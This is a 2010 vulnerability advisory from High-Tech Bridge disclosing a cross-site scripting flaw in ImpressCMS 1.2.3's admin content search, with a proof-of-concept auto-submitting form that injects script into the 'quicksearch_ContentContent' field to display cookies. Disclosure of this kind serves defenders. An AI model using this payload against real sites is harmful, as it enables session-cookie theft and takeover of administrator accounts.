XSS vulnerability in ImpressCMS Dec 21 2010 10:39AM
advisory htbridge ch
Vulnerability ID: HTB22766
Reference: http://www.htbridge.ch/advisory/xss_vulnerability_in_impresscms.html
Product: ImpressCMS
Vendor: The ImpressCMS Project ( http://www.impresscms.org )
Vulnerable Version: 1.2.3 Final and probably prior versions
Vendor Notification:
Vulnerability Type: XSS (Cross Site Scripting)
Status: Not Fixed, Vendor Alerted, Awaiting Vendor Response
Risk level: Medium
Credit: High-Tech Bridge SA - Ethical Hacking & Penetration Testing (http://www.htbridge.ch/)

Vulnerability Details:
User can execute arbitrary JavaScript code within the vulnerable application.

The vulnerability exists due to failure in the "/modules/content/admin/content.php" script to properly sanitize user-supplied input in "quicksearch_ContentContent" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data.

An attacker can use browser to exploit this vulnerability. The following PoC is available:

<form action="http://host/modules/content/admin/content.php" method="post" name="main">
<input type="hidden" name="quicksearch_ContentContent" value='search"><script>alert(document.cookie)</script>'>
<input type="hidden" name="button_quicksearch_ContentContent" value="Search">
<input type="hidden" name="filtersel" value="default">
<input type="hidden" name="limitsel" value="15">
</form>
<script>
document.main.submit();
</script>

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus